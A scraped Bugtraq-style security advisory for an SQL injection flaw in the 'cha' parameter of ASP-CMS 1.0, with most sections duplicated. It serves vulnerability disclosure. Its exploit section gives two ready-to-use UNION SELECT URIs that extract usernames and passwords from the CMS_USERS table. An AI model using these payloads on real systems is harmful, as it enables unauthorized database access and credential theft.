ASP-CMS 'cha' Parameter SQL Injection Vulnerability
BID:32786
Info
ASP-CMS 'cha' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 32786 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 12 2008 12:00AM |
| Updated: | Dec 12 2008 05:22PM |
| Credit: | Sina Yazdanmehr |
| Vulnerable: |
ASP-CMS Project ASP-CMS 1.0 |
| Not Vulnerable: | |
Discussion
ASP-CMS 'cha' Parameter SQL Injection Vulnerability
ASP-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP-CMS 1.0 is vulnerable; other versions may also be affected.
ASP-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP-CMS 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
ASP-CMS 'cha' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
http://www.example.com/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
http://www.example.com/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
Solution / Fix
ASP-CMS 'cha' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ASP-CMS 'cha' Parameter SQL Injection Vulnerability
References:
References:
- ASP-CMS Home Page (ASP-CMS Project)
- ASP-CMS v.1.0 Sql Injection/Database Disclosure ([email protected])